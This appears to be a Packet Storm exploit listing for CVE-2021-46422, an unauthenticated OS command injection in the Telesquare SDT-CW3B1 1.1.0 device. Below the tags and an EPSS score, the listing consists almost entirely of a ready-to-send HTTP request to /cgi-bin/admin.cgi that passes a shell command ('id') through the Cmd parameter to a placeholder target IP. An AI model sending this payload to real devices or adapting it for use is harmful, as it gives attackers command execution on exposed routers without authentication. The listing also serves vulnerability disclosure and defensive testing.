Lucene search

K
packetstormAhmed AlrokyPACKETSTORM:167201
HistoryMay 17, 2022 - 12:00 a.m.

SDT-CW3B1 1.1.0 Command Injection

2022-05-1700:00:00
Ahmed Alroky
packetstormsecurity.com
208
sdt-cw3b1 1.1.0
os command injection
cve-2021-46422
http request
windows
telesquare
command injection
ahmed alroky
aiactive
cgi
vendor home page
authentication required

EPSS

0.96

Percentile

99.5%

`# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection  
# Date: 2022-05-12  
# Exploit Author: Ahmed Alroky  
# Author Company : AIactive  
# Version: 1.0.0  
# Vendor home page : http://telesquare.co.kr/  
# Authentication Required: No  
# CVE : CVE-2021-46422  
  
# Tested on: Windows  
  
# HTTP Request  
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1  
Host: IP_HERE  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36  
Accept: */*  
Referer: http:// IP_HERE /admin/system_command.shtml  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close  
  
`